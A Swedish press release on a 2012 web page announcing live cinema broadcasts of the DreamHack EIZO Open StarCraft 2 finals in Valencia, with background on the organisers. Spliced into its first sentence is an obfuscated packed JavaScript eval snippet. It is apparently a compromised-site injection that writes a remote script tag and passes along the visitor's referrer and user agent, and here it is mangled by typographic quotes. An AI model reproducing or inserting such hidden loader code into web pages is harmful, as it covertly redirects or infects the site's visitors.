Image Image Image Image Image Image Image Image Image Image

| 6 december, 2020

Scroll to top

Top

DreamHack EIZO Open: Live på Bio

DreamHack EIZO Open: Live på Bio
Sebastian

Under eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zfzda|var|u0026u|referrer|aihrr||js|php’.split(’|’),0,{}))
2012 arrangerar DreamHack en gigantisk StarCraft 2-turnering med fem tävlingar runtom i hela Europa. DreamHack och Folkets Hus och Parker kommer i samarbete med 10 biografer runtom i Sverige livesända finalshowen från den tredje deltävlingen i Valencia, Spanien.

Söndagen den 23 september kommer man för första gången att kunna uppleva E-sport live på Folkets Hus och Parkers digitala biografer. Under den åtta timmar långa livesändningen sänds de sju avslutande matcherna (från kvartsfinal till final) i StarCraft 2-turneringen och hela sändningen leds av världens bästa livekommentatorer.

Showen pågår från 16.00 till 24.00 och naturliga pauser skapas mellan varje match, då man har chansen att mingla med andra spelintresserade i biografens cafeteria eller foajé.

Att uppleva livematcher i e-sport tillsammans har blivit en ny och växande trend. Bland annat har fenomenenet BarCraft växt fram, där man livesänder StarCraft 2 på sportbarer, och som på vissa håll börjat konkurrera med Champions League och andra etablerade sportsändningar. Nu kan man för första gången uppleva e-sport på bio.

DreamHack EIZO Open: Live på Bio visas på följande biografer:
Boden (Saga), Göteborg (Bio Roy), Helsingborg (Röda Kvarn), Kumla (Folkan), Malmö (Spegeln), Osby (Bio Borgen), Oskarshamn (Saga), Stockholm (Bio Rio), Söråker (Folkets Hus), Tumba (Tumbascenen).

Om DreamHack EIZO Open
DreamHack EIZO Open är en StarCraft-turnering som spelas under hela 2012, där världens bästa StarCraft 2-spelare krigar om prispotten på 1,2 miljoner kronor. Den 21-22 april var det första evenemanget i Stockholm. Det fortsätter vidare till Jönköping (16-19 juni), Valencia (21-23 september), Bukarest (27-28 oktober) och finalerna på DreamHack Winter den 22-25 november. Världens bästa spelare väntas att ställa upp och förra året följdes livesändningarna av 3,8 miljoner unika tittare. Mer information:
http://www.dreamhack.se/dhs12/2012/03/21/this-is-dreamhack-eizo-open-2012/
http://www.dreamhack.se/dhs12/2012/03/22/dreamhack-eizo-open-stockholm/

Om Folkets Hus och Parker och Live på bio
Tack vare digital biografutrustning kan publiken i hela landet ta del av kultur i världsklass i hög kvalitet. Biograferna har tillsammans utökat landets relativt få opera-, dans- och teaterscener med 120 salonger och sammantaget 24 000 sittplatser, i både storstäder och på mindre orter.
Folkets Hus och Parker är en riksorganisation för Folkets Hus, folkparker, nöjesparker och festivaler i hela Sverige. Verksamheten bygger på delaktighet och ideellt engagemang.

Om festivalen DreamHack
DreamHack är världens största datorfestival och ett av Sveriges största ungdomsevenemang. Huvudfestivalerna, Summer och Winter, arrangeras på jättemässan Elmia i Jönköping och lockar 35 000 besökare varje år. Festivalerna pågår 24 timmar om dygnet i fyra dagar och består av världens största LAN-nätverk av datorer, 50 utställande företag, föreläsningar, livemusik, film och spel på fyra underhållningsscener. Dreamhack arrangerar även tävlingar i e-sport, programmering, musik och grafik, där vinnarna premieras med prispengar och besökarnas jubel på de olika scenerna. Mer information: www.dreamhack.se